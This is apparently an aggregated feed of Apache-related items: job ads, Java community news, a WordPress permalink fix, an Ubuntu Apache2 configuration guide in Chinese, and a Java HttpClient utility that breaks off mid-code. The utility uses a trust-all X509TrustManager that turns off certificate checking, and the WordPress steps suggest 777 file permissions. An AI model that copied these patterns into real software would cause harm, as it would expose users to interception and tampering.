How to Install Joomla with Apache on Debian 9 (Stretch)   
Joomla is one of the most popular and widely supported open source content management system (CMS) platform in the world that can be used to build, organize, manage and publish content for websites, blogs, Intranets and mobile applications. Thie tutorial describes the installation of Joomla with Apache web server and MariaDB on Debian 9.
          Laptop GE72 7RD Apache, Intel Core i7-7700HQ, 16 GB, 1 TB + 256 GB SSD, Microsoft Windows 10 Home, Negru de la MSI   
Laptop GE72 7RD Apache, Intel Core i7-7700HQ, 16 GB, 1 TB + 256 GB SSD, Microsoft Windows 10 Home, Negru de la MSI

Cod produs: #54946
Adaugat la: 2017-03-06 18:17:30
Vezi produsul


          12265 Senior Programmer Analyst - CANADIAN NUCLEAR LABORATORIES (CNL) - Chalk River, ON   
Understanding of server technologies (Internet Information Server, Apache, WebLogic), operating systems (Windows 2008R2/2012, HP-UX, Linux) and server security....
From Indeed - Wed, 07 Jun 2017 17:50:30 GMT - View all Chalk River, ON jobs
          Ghacks Deals: The Ultimate Data Infrastructure Architect Bundle (94% off)   

The Ultimate Data Infrastructure Architect Bundle is an eLearning bundle that includes five courses and five ebooks covering ElasticSearch, Apache Spark 2, AWS, MongoDB or Hadoop 2. All courses are designed for users of all experience levels, and the access period is lifetime. The following courses are included in the bundle: Learning ElasticSearch 5.0 -- […]

Ghacks needs you. You can find out how to support us here or support the site directly by becoming a Patreon. Thank you for being a Ghacks reader.

The post Ghacks Deals: The Ultimate Data Infrastructure Architect Bundle (94% off) appeared first on gHacks Technology News.


          Re: Configure HHTTPS Tomcat to Remedy   

Discussion successfully moved from Developer Community to Remedy AR System

 

Did you modify the "server.xml" from Tomcat? Do you have an Apache httpd or IIS server or is Tomcat "alone"?

Is Tomcat on Windows or Linux?


          New Java Champions: Holly Cummins, Aleksey Shipilev, and David Heffelfinger   

Welcome three new Java Champions: Holly Cummins, Aleksey Shipilev, and David Heffelfinger

Holly Cummins has been a Java engineer since 2001. She was one of the core engineers on the IBM J9 JVM working on Garbage Collection (GC) and Just in Time (JIT) compilation. She is currently a technical lead for IBM BlueMix Garage.   

Holly is also a committer and PMC member on the Apache Aries project, which melds the OSGi and Java EE programming models. She created several wearable projects connected to a backend server to demonstrate the low power requirements of modern application servers, and the suitability of Java for embedded application servers.

Holly is the co-author of Enterprise OSGi in Action (Manning). She has published on a range of subjects, from performance myths, garbage collection tuning principles, enterprise OSGi, Java on Raspberry PIs, microservices, automation, and the importance of fun in a development culture. She is a frequent speaker at conferences including Devoxx and JavaOne. Follow her on Twitter @holly_cummins

Aleksey Shipilev is a principal software engineer at Redhat. He is the author of the Java Microbenchmarking Harness (JMH), a project to examine the performance of Java coding constructs.  Prior to JMH, programmers wrote their benchmarking harnesses fraught with errors.  He wrote JCStress, a toolkit for testing concurrency code. He also developed a Java-Object-Layout, JOL, which uses Unsafe, JVMTI, and Serviceability Agent (SA) heavily to decode the actual object layout, footprint, and references. 

Aleksey is now a committer to the new GC project Shenandoah. He is very active on mailing lists like Java Concurrency Interest, JMH, and OpenJDK projects. Follow him on Twitter @shipilev

David Heffelfinger is an independent consultant based in the Washington, DC area. He is a member of the NetBeans Dream Team and is part of the JavaOne content committee. 

David has written 7 books on Java EE, application servers, NetBeans, JasperReports, and Wicket. His titles include Java EE 7 Development with NetBeans 8, Java EE 7 with GlassFish 4 Application Server, and JasperReports 3.5 For Java Developers. 

David has been speaking at JavaOne every year since 2012. He is a frequent speaker at NetBeans Day in San Francisco, showcasing NetBeans features that greatly enhance the development of Java EE applications. Follow him on Twitter @ensode

The Java Champions are an exclusive group of passionate Java technology and community leaders who are community-nominated and selected under a project sponsored by Oracle. Learn more about Java Champions  p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; -webkit-text-stroke: #000000} span.s1 {font-kerning: none} p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Arial; -webkit-text-stroke: #000000} span.s1 {font-kerning: none}
          Congratulations New Java Champion Bob Paulin   

Welcome New Java Champion Bob Paulin 

Bob Paulin is an independent consultant working for different IT firms. He has 15 years of experience as a developer and has contributed to open source software for the past 10 years.

Bob is currently an ASF member and actively contributes to Apache Tikka, Apache Felix, and Apache Sling. He was nominated as JCP Outstanding Adopt-a-JSR participant for his involvement with Java EE 8. He has run numerous JDK 9 workshops in the Chicago area. 

Bob is the co-host the JavaPubHouse.com, a podcast on a range of Java topics, standards, tools, and techniques. He also participates regularly in the Java Off-Heap, a podcast about Java technology news. 

Bob has run the Devoxx4Kids and GotoJr conferences in Chicago allowing kids to hack in Minecraft, play with Lego robots, and use conductive play-doh. These efforts have enriched the lives of students and are helping inspire students to pursue technical careers. Follow him on Twitter @bobpaulin

Java Champions are an exclusive group of passionate Java technology and community leaders who are community-nominated and selected under a project sponsored by Oracle. Learn more about Java Champions


          (IT) Java Build and Config Engineer - Banking   

Rate: Negotiable   Location: City of London   

Role: Senior Java Build and Config Engineer - Banking Key Essential Skills Java Configuration Build & DevOps Engineer, SDLC, JERA, TeamCity, TDD, MSAzure, Solid background in automated testing. Investment Banking Knowledge of Apache Stack, Flink, Park, Ignite Outline Thebes Group Thebes Group is a leading UK wide IT Infrastructure Technology Consultancy. We are well-known for our extensive talent pool of highly competent IT professionals and exclusive academy Programmes, which provide a great opportunity to undertake technical training in core disciplines. Thebes work with a number of leading vendors, government, financial institutions and insurance companies including investment banks, brokers and hedge funds. To see our list of core capabilities please click here. Essential Experience Configuration/Build Specialist with extensive DevOps Proven Hands on Java skills including related tooling 5+ years' experience in Software programming languages - JavaScript and C++ to run Flink Experience with scalability and setting up/influencing code optimisation. Experience using Cloud based systems Solid understanding of software development life cycle (SDLC) methodologies such as Waterfall and Agile Experience working within a Financial Sector Role & Responsibilities Work constructively with other team members to discuss and solve technical problems Communicate effectively with other geographically-dispersed teams across the business unit Work in conjunction with Business representatives to understand and evolve business requirements and come up with pragmatic and supportable designs To analyse, design and build any such projects Manage projects through the full project life cycle Handle projects that deals with rating, billing and finance and in certain cases, complex projects require coordination with external systems Thebes provides IT solutions & services differently from most other IT service providers. As an Assured Outcome Provider (AOP), we have spent fifteen years willingly sharing the client's risk with them by focusing on outputs (ie quality service & solutions and return on investment ROI) rather than inputs (ie pricelists and headcount). We do this by fitting our skills, solutions & capabilities to needs, augmenting our staff with enthusiastic professionals from our Academy Programme and remaining flexible as our clients' needs change. Thebes Group is a leading IT services and technology consultancy based in the city of London and Milton Keynes. Thebes work with a number of leading Vendors, Government, Insurance and Financial Institutions including Investment Banks, Brokers, Hedge Funds. Established in 1992, we are a full service provider that is 100% focused on delivering client value. We design, develop and implement leading technology solutions and resources, which help you, run your businesses better. Thebes - Lead by Passion, Driven by Innovation and Dedicated to Results. Thebes may process any personal information supplied
 
Rate: Negotiable
Type: Contract
Location: City of London
Country: UK
Contact: Thebes Group
Advertiser: Thebes IT Solutions Ltd
Start Date: ASAP
Reference: JS-JALJAVA BUILD AND CO

          (IT) Senior Java Build and Config Engineer - Banking   

Rate: Negotiable   Location: City of London   

Key Essential Skills Java Configuration Build & DevOps Engineer, SDLC, JERA, TeamCity, TDD, MSAzure, Solid background in automated testing. Investment Banking Knowledge of Apache Stack, Flink, Park, Ignite Outline Thebes Group Thebes Group is a leading UK wide IT Infrastructure Technology Consultancy. We are well-known for our extensive talent pool of highly competent IT professionals and exclusive academy Programmes, which provide a great opportunity to undertake technical training in core disciplines. Thebes work with a number of leading vendors, government, financial institutions and insurance companies including investment banks, brokers and hedge funds. Essential Experience Configuration/Build Specialist with extensive DevOps Proven Hands on Java skills including related tooling 10+ years' experience in Software programming languages - JavaScript and C++ to run Flink Experience with scalability and setting up/influencing code optimisation. Experience using Cloud based systems Solid understanding of software development life cycle (SDLC) methodologies such as Waterfall and Agile Experience working within a Financial Sector Role & Responsibilities Work constructively with other team members to discuss and solve technical problems. Mentoring and coaching Communicate effectively with other geographically-dispersed teams across the business unit Work in conjunction with Business representatives to understand and evolve business requirements and come up with pragmatic and supportable designs To analyse, design and build any such projects Manage projects through the full project life cycle Handle projects that deals with rating, billing and finance and in certain cases, complex projects require coordination with external systems Thebes provides IT solutions & services differently from most other IT service providers. As an Assured Outcome Provider (AOP), we have spent fifteen years willingly sharing the client's risk with them by focusing on outputs (ie quality service & solutions and return on investment ROI) rather than inputs (ie pricelists and headcount). We do this by fitting our skills, solutions & capabilities to needs, augmenting our staff with enthusiastic professionals from our Academy Programme and remaining flexible as our clients' needs change. Thebes Group is a leading IT services and technology consultancy based in the city of London and Milton Keynes. Thebes work with a number of leading Vendors, Government, Insurance and Financial Institutions including Investment Banks, Brokers, Hedge Funds. Established in 1992, we are a full service provider that is 100% focused on delivering client value. We design, develop and implement leading technology solutions and resources, which help you, run your businesses better. Thebes - Lead by Passion, Driven by Innovation and Dedicated to Results. Thebes may process any personal information supplied in relation to your application. By providing your information, you consent to Thebes using
 
Rate: Negotiable
Type: Contract
Location: City of London
Country: UK
Contact: Thebes Group
Advertiser: Thebes IT Solutions Ltd
Start Date: ASAP
Reference: JS-JALSENIOR JAVA BUILD

          (IT) Full Stack Developer   

Rate: £350 - £450 per Day   Location: Glasgow, Scotland   

Full Stack Developer - 12 month contract - Glasgow City Centre One of Harvey Nash's leading FS clients is looking for an experienced full stack developer with an aptitude for general infrastructure knowledge. This will be an initial 12 month contract however the likelihood of extension is high. The successful candidate will be responsible for creating strategic solutions across a broad technology footprint. Experience within financial services would be advantageous, although not a prerequisite. Skill Set: - Previous Experience full-stack development experience with C#/C++/Java, Visual Studio, .Net, Windows/Linux web development - Understanding of secure code development/analysis - In-depth knowledge of how software works - Development using SQL and Relational Databases (eg SQL, DB2, Sybase, Oracle, MQ) - Windows Automation and Scripting (PowerShell, WMI) - Familiarity with common operating systems and entitlement models (Windows, Redhat Linux/Solaris) - Understanding of network architecture within an enterprise environment (eg Firewalls, Load Balancers) - Experience of developing in a structured Deployment Environment (DEV/QA/UAT/PROD) - Familiarity with the Software Development Life Cycle (SDLC) - Experience with Source Control and CI systems (eg GIT, Perforce, Jenkins) - Experience with Unit and Load testing tools - Experience with Code Review products (eg Crucible, FishEye) - Excellent communication/presentation skills and experience working with distributed teams - Candidates should demonstrate a strong ability to create technical, architectural and design documentationDesired Skills - Any experience creating (or working with) a "developer desktop" (dedicated desktop environment for developers) - Experience of the Linux development environment - An interest in cyber security - Knowledge of Defense in Depth computing principles - Experience with security products and technologies(eg Cyberark, PKI) - Systems management, user configuration and technology deployments across large, distributed environments (eg Chef, Zookeeper) - Understanding of core Windows Infrastructure technologies (eg Active Directory, GPO, CIFS, DFS, NFS) - Monitoring Tools (eg Scom, Netcool, WatchTower) - Experience with Apache/Tomcat-web server "Virtualisation" - Design patterns and best practices - Agile development: Planning, Retrospectives etc. To apply for this role or to discuss it in more detail then please call me and send a copy of your latest CV.
 
Rate: £350 - £450 per Day
Type: Contract
Location: Glasgow, Scotland
Country: UK
Contact: Cameron MacGrain
Advertiser: Harvey Nash Plc
Start Date: ASAP
Reference: JS-329601/001

          (IT) Hadoop Architect/Developer   

Location: Foster City, CA   

Key Responsibilities: Visa is currently seeking for a Senior Hadoop Architect/Developer with extensive experience in RDBMS data modelling/dev with Tableau developer experience in Finance area to deliver Corporate Analytics new strategic framework initiative. This BI platform provides analytical/operational capability to various business domains that are to be used by Corporate Finance Systems. This Developer role will be primarily responsible for designing, developing and implementing Hadoop framework ETL using relational databases and use Tableau reporting on it. The new Hadoop framework to be used to build from the scratch Oracle Financial analytics/P2P/Spend/Fixed asset solution into Hadoop framework from OBIA. The individual should have a finance business background with extensive experience in OBIA Fixed Assets, P2P, Financial analytics, Spend Analytics, and Projects. Expert in Hadoop framework components like Sqoop, Hive, Impala, Oozie, Spark, HBase, HDFS.. " Architect, Design and implement column family schemas of Hive and HBase within HDFS. Assign schemas and create Hive tables. Managing and deploying HDFS HBase clusters. " Develop efficient pig and hive scripts with joins on datasets using various techniques. Assess the quality of datasets for a hadoop data lake. Apply different HDFS formats and structure like Parquet, Avro, etc. to speed up analytics " Fine tune hadoop applications for high performance and throughput. Troubleshoot and debug any hadoop ecosystem run time issues " Hands on experience in configuring, and using Hadoop ecosystem components like Hadoop MapReduce, HDFS, HBase, Hive, Sqoop, Spark, Impala, Pig, Oozie, Zookeeper and Flume. " Desired candidate should have strong programming skills on Scala or Python to work on Spark " Experience in converting core ETL logics using PySpark SQL or Scala language " Good experience on Apache Hadoop Map Reduce programming, PIG Scripting and Distribute Application and HDFS. " In-depth understanding of Data Structure and Algorithms. " Experience in managing and reviewing Hadoop log files. " Implemented in setting up standards and processes for Hadoop based application design and implementation. " Experience in importing and exporting data using Sqoop from HDFS to Relational Database Systems and vice-versa. " Experience in Object Oriented Analysis, Design (OOAD) and development of software using UML Methodology, good knowledge of J2EE design patterns and Core Java design patterns. " Experience in managing Hadoop clusters using Cloudera Manager tool. " Very good experience in complete project life cycle (design, development, testing and implementation) of Client Server and Web applications " Experience in connecting Hadoop framework components to Tableau reporting " Expert in Tableau data blending and data modeling. " Create Functional and Technical design documentation " Perform Unit and QA testing data loads and development of scripts for data validation " Support QA, UAT, SIT and
 
Type: Contract
Location: Foster City, CA
Country: United States of America
Contact: Baljit Gill
Advertiser: Talentburst, Inc.
Reference: NT17-11842

          (IT) Senior Java Developer - Financial   

Rate: £400 - 450 per Day   Location: Lancashire   

Location : North West, United Kingdom Rate : £400 - 450 per day Duration: 6 monthsinitially Position: Contract Gibbs Hybrid are currently recruiting for a Senior Java Developer to join a large client of ours based in Lancashire or Stockport. This role is an initial 6 month contract and paying c£400 per day. The role: You will be a Senior Java Developer, in addition to coding, able to coach junior developer teams, and teach Java best practice. Leading a team of 10 Java Developers You will have: You will have experience of Java. JUnit. Apache Camel. Apache CXF. Webservice design/deployment. Java Front End Experienced Java Developer ideally with Apache Camel or equivalent If this role is of interest please click Apply Now' with an up to date CV for more information.
 
Rate: £400 - 450 per Day
Type: Contract
Location: Lancashire
Country: UK
Contact: Jenna Brown
Advertiser: Gibbs Hybrid Workforce Solutions
Email: Jenna.Brown.2240D.8C39F@apps.jobserve.com
Start Date: ASAP
Reference: JSCSPJBJD

          (IT) Senior Java Engineer - Dublin   

Rate: Euros 500 +   Location: Dublin   

Financial Services Powerhouse client of mine is looking to add 2 Senior Engineers to their team to work on a large scaling platform which has 20,000 users. They are looking to implement and add new tools to their platform to ensure that their business and trading platforms are up to the level that enables their business to grow 3 fold this year. Paying excellent daily rates and chance to joining a team in which is at the forefront of my clients innovation centre. What they are looking for: -At least 5 years of experience in delivery of innovative software solutions (Java) -Experience migrating enterprise grade solutions to cloud offerings -Solid Application development background with a focus on Java, in an enterprise environment -Experience setting up large scale CI/CD pipelines -Familiarity with software development tools such as: JIRA, Confluence, SVN, Artifactory and others -Experience with continuous integration Servers (TeamCity, Jenkins) -Experience with virtualization solutions (vRealize) -Experience working with containers (Docker) -Ability to partner with senior stakeholders both in the team and across teams -Dedicated self-starter, ability to drive a team and its contribution Skills that would be advantageous to have: -Maven/Gradle/MSBuild/cmake -Apache/Tomcat skills -Grails/Groovy -Track record on Linux Java application debugging and tuning -Work experience in large multinational corporations -Familiarity with agile methodologies Contact Brendan (see below)
 
Rate: Euros 500 +
Type: Contract
Location: Dublin
Country: Ireland
Contact: Brendan Hennessy
Advertiser: Stelfox Ltd
Email: Brendan.Hennessy.3712A.B45A6@apps.jobserve.com
Start Date: ASAP
Reference: JS

          Выпуск cистемы управления контейнерной виртуализацией Docker 17.06   
Представлен релиз инструментария для управления изолированными Linux-контейнерами Docker 17.06, предоставляющего высокоуровневый API для манипуляции контейнерами на уровне изоляции отдельных приложений. Docker позволяет, не заботясь о формировании начинки контейнера, запускать произвольные процессы в режиме изоляции и затем переносить и клонировать сформированные для данных процессов контейнеры на другие серверы, беря на себя всю работу по созданию, обслуживанию и сопровождению контейнеров. Инструментарий базируется на применении встроенных в ядро Linux штатных механизмов изоляции на основе пространств имён (namespaces) и групп управления (cgroups). Код Docker написан на языке Go и распространяется под лицензией Apache 2.0.
          JBoss Tools Team: JBoss Tools 4.5.0.AM1 for Eclipse Oxygen.0   

Happy to announce 4.5.0.AM1 (Developer Milestone 1) build for Eclipse Oxygen.0.

Downloads available at JBoss Tools 4.5.0 AM1.

What is New?

Full info is at this page. Some highlights are below.

Server Tools

EAP 7.1 Server Adapter

A server adapter has been added to work with EAP 7.1. It’s currently released in Tech-Preview mode only, since the underlying WildFly 11 continues to be under active development with substantial opportunity for breaking changes. This new server adapter includes support for incremental management deployment like it’s upstream WildFly 11 counterpart.

Removal of Event Log and other Deprecated Code

The Event Log view has been removed. The standard eclipse log is to be used for errors and other important messages regarding errors during server state transitions.

Hibernate Tools

Hibernate Search Support

We are glad to announce the support of the Hibernate Search. The project was started by Dmitrii Bocharov in the Google Summer Code program and has been successfully transferred in the current release of the JBoss Tools from Dmitrii’s repository into the jbosstools-hibernate repository and has become a part of the JBoss family of tools.

Functionality

The plugin was thought to be some kind of a Luke tool inside Eclipse. It was thought to be more convenient than launching a separate application, and picks up the configuration directly from your Hibernate configuration.

Two options were added to the console configurations submenu: Index Rebuild and Index Toolkit. They become available when you use hibernate search libraries (they exist in the build path of your application, e.g. via maven).

Configuration menu items
Index Rebuild

When introducing Hibernate Search in an existing application, you have to create an initial Lucene index for the data already present in your database.

The option "Index Rebuild" will do so by re-creating the Lucene index in the directory specified by the hibernate.search.default.indexBase property.

Hibernate Search indexed entities
Hibernate Search configuration properties
Index Toolkit

"Open Index Toolkit" submenu of the console configuration opens an "Index Toolkit" view, which has three tabs: Analyzers, Explore Documents, Search.

Analyzers

This tab allows you to view the result of work of different Lucene Analyzers. The combo-box contains all classes in the workspace which extend org.apache.lucene.analysis.Analyzer, including custom implementations created by the user. While you type the text you want to analyse, the result immediately appears on the right.

Analyzers
Explore Documents

After creating the initial index you can now inspect the Lucene Documents it contains.

All entities annotated as @Indexed are displayed in the Lucene Documents tab. Tick the checkboxes as needed and load the documents. Iterate through the documents using arrows.

Lucene Documents inspection
Searching

The plugin passes the input string from the search text box to the QueryParser which parses it using the specified analyzer and creates a set of search terms, one term per token, over the specified default field. The result of the search pulls back all documents which contain the terms and lists them in a table below.

Search tab

Demo

Docker

Docker Client Upgrade

The version of docker-client used by the Docker Tooling plug-ins has been upgraded to 6.1.1 for the 3.0.0 release of the Docker Tooling feature.

Forge

Forge Runtime updated to 3.7.1.Final

The included Forge runtime is now 3.7.1.Final. Read the official announcement here.

startup

Enjoy!

Jeff Maury


          Apache HBase: The NoSQL Database for Hadoop and Big Data   

Use HBase when you need random, real-time read/write access to your Big Data. The goal of the HBase project is to host very large tables — billions of rows multiplied by millions of columns — on clusters built with commodity hardware. HBase is an open-source, distributed, versioned, column-oriented store modeled after Google’s Bigtable. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of Hadoop and HDFS.

Refcardz are FREE cheat sheets made just for developers. It’s the easy way to stay on top of the newest technologies!



Request Free!

          Wordpress change permalinks to Postname cause Page Not Found   

Originally posted on: http://geekswithblogs.net/sathya/archive/2017/06/16/wordpress-change-permalinks-to-postname-cause-page-not-found.aspx

When you select postname in permalinks of wordpress admin page, it might not work sometimes.
Following are the reasons.

* If in the admin permalinks page itself if it shows some message saying "if you have given permissions to .htaccess we could have done this ourselves". Do the following

1. Go to wordpress installation folder in ftp or if you are connected to your ssh, navigate to the folder
2. Ensure that you that you have permissions 644 for .htaccess file and wp-config.php file  (If you use filezilla, you can rightclick on the file and ensure that these are checked : 
Owner Permissions : Read and Write
Group Permissions : Read 
Public Permissions : Read)
3. Also ensure that 755 permission is given for all the subfolders under your installation directory
4. Go to admin - permalinks page again, choose postname option and save it, the * message mentioned above should go away
5. if you still see * message as mentioned above, try to set the permissions for .htaccess file as 777 and do step 4 again.
6. now you should not see the * message anymore if you have done step 5

7. try to navigate to the post you have created 
8. if it works, go to filezilla and change the permissions back to 644 and everything should still work fine.
9. if it still doesn't work and if it says 404 page not found, do the following.
10. ssh to the server
12. vim /etc/apache2/apache2.conf (might be httpd.conf in some cases)
13. find the word Directory
14. You can see a couple of Directory sections like that (ex: <Directory /usr/asdf>...</Directory>.
15. Insert an additional section next to what you have like below. (ensure that you mention your complete wordpress installtion path. The path given below is just an example. for the given path, AllowOverride is what matters. So ensure that AllowOverride is set to All for the folder that you mention under the Directory tag.

<Directory /var/www/myfolder/htdocs/wpinstallationfolder/>

        Options Indexes FollowSymLinks

        AllowOverride All

        Require all granted

</Directory>

16. Restart your apache server.
In my case its service apache2 restart
it can also be service httpd restart
17. Refresh your sample blog that you have created or create a new blog post from the admin page and try navigating to it, it should all work fine.


If it still doesnt work, it means your module rewrite may not be enabled.
Ensure that this line is uncommented (remove the # in front of the following line) in the /etc/apache2/apache2.conf (or) httpd.conf

LoadModule rewrite_module modules / mod_rewrite.so

Ensure to restart the apache server and refresh the page and try again.

Ensure to do step 8 finally, if you have not done it already.

          ubuntu apache2配置详解(含虚拟主机配置方法)   

网上查到的是Apache2.2的配置,而Apache2.4使用相同配置后不能访问,出现“apache AH01630: client denied by server configuration” 这时只要把

  1. Order deny,allow  
  2. Allow from all  
替换为
  1. Require all granted  

即可。

===============================================================

在Windows下,Apache的配置文件通常只有一个,就是httpd.conf。但我在Ubuntu Linux上用apt-get install apache2命令安装了Apache2后,竟然发现它的httpd.conf(位于/etc/apache2目录)是空的!进而发现Ubuntu的 Apache软件包的配置文件并不像Windows的那样简单,它把各个设置项分在了不同的配置文件中,看起来复杂,但仔细想想设计得确实很合理。

严格地说,Ubuntu的Apache(或者应该说Linux下的Apache?我不清楚其他发行版的apache软件包)的配置文件是 /etc/apache2/apache2.conf,Apache在启动时会自动读取这个文件的配置信息。而其他的一些配置文件,如 httpd.conf等,则是通过Include指令包含进来。在apache2.conf中可以找到这些Include行:

# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf

# Include all the user configurations:
Include /etc/apache2/httpd.conf

# Include ports listing
Include /etc/apache2/ports.conf
……
# Include generic snippets of statements
Include /etc/apache2/conf.d/

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/

结合注释,可以很清楚地看出每个配置文件的大体作用。当然,你完全可以把所有的设置放在apache2.conf或者httpd.conf或者任何一个配置文件中。Apache2的这种划分只是一种比较好的习惯。

安装完Apache后的最重要的一件事就是要知道Web文档根目录在什么地方,对于Ubuntu而言,默认的是/var/www。怎么知道的呢? apache2.conf里并没有DocumentRoot项,httpd.conf又是空的,因此肯定在其他的文件中。经过搜索,发现在 /etc/apache2/sites-enabled/000-default中,里面有这样的内容:

NameVirtualHost *

ServerAdmin webmaster@localhost

DocumentRoot /var/www/
……

这是设置虚拟主机的,对我来说没什么意义。所以我就把apache2.conf里的Include /etc/apache2/sites-enabled/一行注释掉了,并且在httpd.conf里设置DocumentRoot为我的用户目录下的某 个目录,这样方便开发。

再看看/etc/apache2目录下的东西。刚才在apache2.conf里发现了sites-enabled目录,而在 /etc/apache2下还有一个sites-available目录,这里面是放什么的呢?其实,这里面才是真正的配置文件,而sites- enabled目录存放的只是一些指向这里的文件的符号链接,你可以用ls /etc/apache2/sites-enabled/来证实一下。所以,如果apache上配置了多个虚拟主机,每个虚拟主机的配置文件都放在 sites-available下,那么对于虚拟主机的停用、启用就非常方便了:当在sites-enabled下建立一个指向某个虚拟主机配置文件的链 接时,就启用了它;如果要关闭某个虚拟主机的话,只需删除相应的链接即可,根本不用去改配置文件。

======================================================

mods-available、mods-enabled和上面说的sites-available、sites-enabled类似,这两个目录 是存放apache功能模块的配置文件和链接的。当我用apt-get install php5安装了PHP模块后,在这两个目录里就有了php5.load、php5.conf和指向这两个文件的链接。这种目录结果对于启用、停用某个 Apache模块是非常方便的。

最后一个要说的是ports.conf,这里面设置了Apache使用的端口。如果需要调整默认的端口设置,建议编辑这个文件。或者你嫌它实在多 余,也可以先把apache2.conf中的Include /etc/apache2/ports.conf一行去掉,在httpd.conf里设置Apache端口。

ubuntu里缺省安装的目录结构很有一点不同。在ubuntu中module和 virtual host的配置都有两个目录,一个是available,一个是enabled,available目录是存放有效的内容,但不起作用,只有用ln 连到enabled过去才可以起作用。对调试使用都很方便,但是如果事先不知道,找起来也有点麻烦。

/etc/apache2/sites-available 里放的是VH的配置,但不起作用,要把文件link到 sites-enabled 目录里才行。

  

        ServerName 域名  

 

        DocumentRoot 把rails项目里的public当根目录  

          

                Options ExecCGI FollowSymLinks  

                AllowOverride all  

                allow from all  

                Order allow,deny  

          

        ErrorLog /var/log/apache2/error-域名.log  

 

====================================================

 

什么是 Virtual Hosting(虚拟主机)?
简单说就是同一台服务器可以同时处理超过一个域名(domain)。假设www.example1.net和 www.example2.net两个域名都指向同一服务器,WEB服务器又支持Virtual Hosting,那么www.example1.net和www.example2.net可以访问到同一服务器上不同的WEB空间(网站文件存放目 录)。

 

配置格式

在Apache2中,有效的站点信息都存放在/etc/apache2/sites-available/用户名(文件) 里面。 我们可以添加格式如下的信息来增加一个有效的虚拟空间,将default里的大部分东西拷贝过来就行了,记得改DocumentRoot作为默认目录,在Directory中设置路径,注意端口号不要与其他的虚拟主机重复:

# 在ServerName后加上你的网站名称

ServerName  www.demo.com


# 在ServerAdmin后加上网站管理员的电邮地址,方便别人有问题是可以联络网站管理员。

ServerAdmin fish@demo.com

# 在DocumentRoot后加上存放网站内容的目录路径(用户的个人目录)

DocumentRoot /home/fish/www/html

Options Indexes FollowSymLinks MultiViews

Require all granted


ErrorLog /home/fish/www/html/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /home/fish/www/html/access.log combined

ServerSignature On


如果你的服务器有多个IP,而不同的IP又有着不一样的虚拟用户的话,可以修改成:


...

启用配置

前面我们配置好的内容只是“有效”虚拟主机,真正发挥效果的话得放到 /etc/apache2/sites-enabled 文件夹下面。我们可以使用ln命令来建立一对关联文件:

sudo ln -s /etc/apache2/sites-available/www.demo.com.conf /etc/apache2/sites-enabled/www.demo.com.conf 

检查语法,重启web服务

谨慎起见,我们在重启服务前先检查下语法:


sudo apache2ctl configtest

没有错误的话,再重启Apache


sudo /etc/init.d/apache2 -k restart

 



 
          httpClient Https 单向不验证(httpClient连接池)    
废话少说,直接上代码,以前都是调用别人写好的,现在有时间自己弄下,具体功能如下:
1、httpClient+http+线程池:
2、httpClient+https(单向不验证证书)+线程池:

https在%TOMCAT_HOME%/conf/server.xml里面的配置文件
<Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true" 
     maxThreads="150" scheme="https" secure="true" 
     clientAuth="false" keystoreFile="D:/tomcat.keystore" 
     keystorePass="heikaim" sslProtocol="TLS"  executor="tomcatThreadPool"/> 
其中 clientAuth="false"表示不开启证书验证,只是单存的走https



package com.abin.lee.util;

import org.apache.commons.collections4.MapUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.http.*;
import org.apache.http.client.HttpRequestRetryHandler;
import org.apache.http.client.config.CookieSpecs;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.protocol.HttpClientContext;
import org.apache.http.config.Registry;
import org.apache.http.config.RegistryBuilder;
import org.apache.http.conn.ConnectTimeoutException;
import org.apache.http.conn.socket.ConnectionSocketFactory;
import org.apache.http.conn.socket.PlainConnectionSocketFactory;
import org.apache.http.conn.ssl.NoopHostnameVerifier;
import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.impl.conn.PoolingHttpClientConnectionManager;
import org.apache.http.message.BasicHeader;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.protocol.HttpContext;
import org.apache.http.util.EntityUtils;

import javax.net.ssl.*;
import java.io.IOException;
import java.io.InterruptedIOException;
import java.net.UnknownHostException;
import java.nio.charset.Charset;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.*;

/**
* Created with IntelliJ IDEA.
* User: abin
* Date: 16-4-18
* Time: 上午10:24
* To change this template use File | Settings | File Templates.
*/
public class HttpClientUtil {
private static CloseableHttpClient httpsClient = null;
private static CloseableHttpClient httpClient = null;

static {
httpClient = getHttpClient();
httpsClient = getHttpsClient();
}

public static CloseableHttpClient getHttpClient() {
try {
httpClient = HttpClients.custom()
.setConnectionManager(PoolManager.getHttpPoolInstance())
.setConnectionManagerShared(true)
.setDefaultRequestConfig(requestConfig())
.setRetryHandler(retryHandler())
.build();
} catch (Exception e) {
e.printStackTrace();
}
return httpClient;
}


public static CloseableHttpClient getHttpsClient() {
try {
//Secure Protocol implementation.
SSLContext ctx = SSLContext.getInstance("SSL");
//Implementation of a trust manager for X509 certificates
TrustManager x509TrustManager = new X509TrustManager() {
public void checkClientTrusted(X509Certificate[] xcs,
String string) throws CertificateException {
}
public void checkServerTrusted(X509Certificate[] xcs,
String string) throws CertificateException {
}
public X509Certificate[] getAcceptedIssuers() {
return null;
}
};
ctx.init(null, new TrustManager[]{x509TrustManager}, null);
//首先设置全局的标准cookie策略
// RequestConfig requestConfig = RequestConfig.custom().setCookieSpec(CookieSpecs.STANDARD_STRICT).build();
ConnectionSocketFactory connectionSocketFactory = new SSLConnectionSocketFactory(ctx, hostnameVerifier);
Registry<ConnectionSocketFactory> socketFactoryRegistry = RegistryBuilder.<ConnectionSocketFactory>create()
.register("http", PlainConnectionSocketFactory.INSTANCE)
.register("https", connectionSocketFactory).build();
// 设置连接池
httpsClient = HttpClients.custom()
.setConnectionManager(PoolsManager.getHttpsPoolInstance(socketFactoryRegistry))
.setConnectionManagerShared(true)
